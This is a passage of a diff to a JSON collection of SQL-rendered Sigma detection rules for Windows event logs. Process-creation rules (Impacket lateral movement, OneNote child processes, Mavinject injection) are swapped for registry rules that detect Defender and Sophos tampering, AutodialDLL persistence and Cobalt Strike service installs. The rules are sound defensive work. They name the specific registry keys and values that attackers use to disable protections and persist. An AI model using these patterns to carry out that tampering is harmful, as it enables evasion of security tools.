"attack.execution", "attack.privilege_escalation", - "attack.t1068" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentProcessName LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((NewValue LIKE '%ADMIN$%' ESCAPE '\\' AND NewValue LIKE '%.exe%' ESCAPE '\\') OR (NewValue LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND NewValue LIKE '%start%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2021_41379.yml" + "filename": "registry_set_cobaltstrike_service_installs.yml" }, { - "title": "Wscript Shell Run In CommandLine", - "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "title": "Tamper With Sophos AV Registry Keys", + "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", "status": "experimental", - "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "description": "Detects tamper attempts to sophos av functionality via registry key modification", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Rare legitimate inline scripting by some administrators" + "Some FP may occur when the feature is 
disabled by the AV itself, you should always investigate if the action was legitimate" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_script_wscript_shell_cli.yml" + "filename": "registry_set_sophos_av_tamper.yml" }, { - "title": "PrintBrm ZIP Creation of Extraction", - "id": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "title": "Potential Persistence Via AutodialDLL", + "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "status": "experimental", - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. 
PrintBrm.exe should not be run on a normal workstation.", - "author": "frack113", + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1564.004" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\PrintBrm.exe' ESCAPE '\\' AND CommandLine LIKE '% -f%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_printbrm.yml" + "filename": "registry_set_persistence_autodial_dll.yml" }, { - "title": "HackTool - Potential Impacket Lateral Movement Activity", - "id": "10c14723-61c7-4c75-92ca-9af245723ad2", - "status": "stable", - "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", - "author": "Ecco, oscd.community, Jonhnathan Ribeiro, Tim Rauch", + "title": "Disable Windows Defender Functionalities Via Registry Keys", + "id": "0eb46774-f1ab-4a74-8238-1155855f2263", + "status": "experimental", + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\127.0.0.1\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\' OR ParentCommandLine LIKE '%taskeng.exe%' ESCAPE '\\') AND CommandLine LIKE '%cmd.exe%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%Windows\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%&1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\MpEngine\\\\MpEnablePus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "proc_creation_win_hktl_impacket_lateral_movement.yml" + "filename": "registry_set_windows_defender_tamper.yml" }, { - "title": "Suspicious WMIC Execution Via Office Process", - "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", + "title": "Potential Attachment Manager Settings Associations Tamper", + "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", "status": "experimental", - "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", - "author": "Vadim Khrykov, Cyb3rEng", + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND 
(CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND NewValue = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (NewValue LIKE '%.zip;%' ESCAPE '\\' OR NewValue LIKE '%.rar;%' ESCAPE '\\' OR NewValue LIKE '%.exe;%' ESCAPE '\\' OR NewValue LIKE '%.bat;%' ESCAPE '\\' OR NewValue LIKE '%.com;%' ESCAPE '\\' OR NewValue LIKE '%.cmd;%' ESCAPE '\\' OR NewValue LIKE '%.reg;%' ESCAPE '\\' OR NewValue LIKE '%.msi;%' ESCAPE '\\' OR NewValue LIKE '%.htm;%' ESCAPE '\\' OR NewValue LIKE '%.html;%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" + "filename": "registry_set_policies_associations_tamper.yml" }, { - "title": "File Download Using Notepad++ GUP Utility", - "id": "44143844-0631-49ab-97a0-96387d6b2d7c", + "title": "Custom File Open Handler Executes PowerShell", + "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the abuse of custom file open handler, executing powershell", + "author": "CD_R0M_", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Other parent processes 
other than notepad++ using GUP that are not currently identified" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\' AND NewValue LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_gup_download.yml" + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" }, { - "title": "Wab Execution From Non Default Location", - "id": "395907ee-96e5-4666-af2e-2ca91688e151", + "title": "Registry Persitence via Service in Safe Mode", + "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", "status": "experimental", - "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.execution" + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wab.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wabmig.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Windows Mail\\\\%' ESCAPE '\\' OR NewProcessName LIKE 
'C:\\\\Program Files (x86)\\\\Windows Mail\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND NewValue = 'Service') AND NOT ((NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_wab_execution_from_non_default_location.yml" + "filename": "registry_set_add_load_service_in_safe_mode.yml" }, { - "title": "Mavinject Inject DLL Into Running Process", - "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "title": "Disable Macro Runtime Scan Scope", + "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", + "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "status": "experimental", - "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentProcessName LIKE 
'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Common\\\\Security%' ESCAPE '\\' AND TargetObject LIKE '%\\\\MacroRuntimeScanScope' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" + "filename": "registry_set_disable_macroruntimescanscope.yml" }, { - "title": "Suspicious Microsoft OneNote Child Process", - "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "title": "Windows Defender Service Disabled", + "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", "status": "experimental", - "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", + "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", "tags": [ - "attack.t1566", - "attack.t1566.001", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "File located in the AppData folder with trusted signature" + "Administrator actions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 
'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND NewValue = 'DWORD (0x00000004)')" ], - "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" + "filename": 
"registry_set_disable_windows_defender_service.yml" }, { - "title": "Net WebClient Casing Anomalies", - "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", - "status": "experimental", - "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", + "title": "Suspicious Printer Driver Empty Manufacturer", + "id": "e0813366-0407-449a-9869-a2db1119dc41", + "status": "test", + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Unknown" + "Alerts on legitimate printer drivers that do not set any more details in the Manufacturer value" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR 
CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE 
